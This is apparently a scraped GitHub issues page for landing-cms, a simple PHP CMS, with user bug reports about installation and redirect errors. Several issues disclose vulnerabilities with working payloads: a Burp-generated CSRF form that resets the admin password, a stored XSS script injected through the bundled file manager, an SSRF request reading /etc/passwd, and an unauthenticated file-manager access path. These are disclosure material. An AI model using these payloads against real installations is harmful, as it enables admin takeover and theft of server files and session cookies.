elias-black / landing-cms Goto Github PK
View Code? Open in Web Editor NEWA simple CMS for landing pages
License: GNU Lesser General Public License v2.1
A simple CMS for landing pages
License: GNU Lesser General Public License v2.1
Hello, thx for this app. the issue is.... I cant install this cms. Then change all permissions, go to /cms pannel and error 404. My url project is http://localhost:44333/www/test-cms/ When i want to go to http://localhost:44333/www/test-cms/ the app redirect to http://localhost:44333/cms/
Thx for u help.
PD: This issue also happens in live server.
Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/public.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\web\index.php on line 24
Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/password.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php on line 112
Warning: Cannot modify header information - headers already sent by (output started at E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php:112) in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\utils.class.php on line 37
http://192.168.18.130/cms/password/
I can change the admin's password when admin click the csrf html file.
payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.18.130/cms/password/" method="POST">
<input type="hidden" name="pwd1" value="12345" />
<input type="hidden" name="pwd2" value="12345" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
http://infozavri.my.to/cms/
some blocks are not appear on the front-end,
but appear on back-end.
password: *** (removed after 2 days of no-answer)
Landing-CMS dead as many others...
First access the file management page, then click new file to upload the file, select the html file format.
http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php
payload:<script>alert(document.cookie)</scrtipt>
When we input the file content as payload, we find that the front end does not allow input /, so we can capture the package and modify the content or paste the payload directly into the file content.
Right-click the file and select "show url", open the file URL to trigger xss.
When the administrator opens the file after uploading the file, it can also trigger xss.
A SSRF vulnerability was discovered in landing-cms .here is a SSRF vulnerability that allows attackers to read server sensitive information. via /assets/vendor/responsive_filemanager_9.12.1/filemanager/upload.php
post: fldr=test11&url=file:///etc/passwd
and then cos would touch a file named fldr and the name of ssrf file
Здравствуйте, Илья!
Ваша CMS просто идеальна, и проста. Это именно то, что я не раз начинал писать, бросал из-за горящих сроков и откладывал в долгий ящик.
Единственное, чего очень не хватает - это реализации мультиполей. Это полезно, когда например на лендинге галерея изображений, или список партнеров, или например каталог продукции.
Это дополнение очень сильно облегчит мне жизнь, поэтому я даже готов отблагодарить финансово.
Так же было бы круто, среди типов полей видеть селекты и выбор файла.
Если что, пишите на почту: [email protected]
First of all, I did not enter the password to access and found it was blocked.
But I can still access the file management page.
http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php
The normal logical operation is to first enter the password to access the main page, then click add filed, create the type as file uploader, and finally we can upload files in the main page.
whenever click on http://localhost/cms/cms/ it's redirecting to http://localhost/cms/password/ and showing 404 error...
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.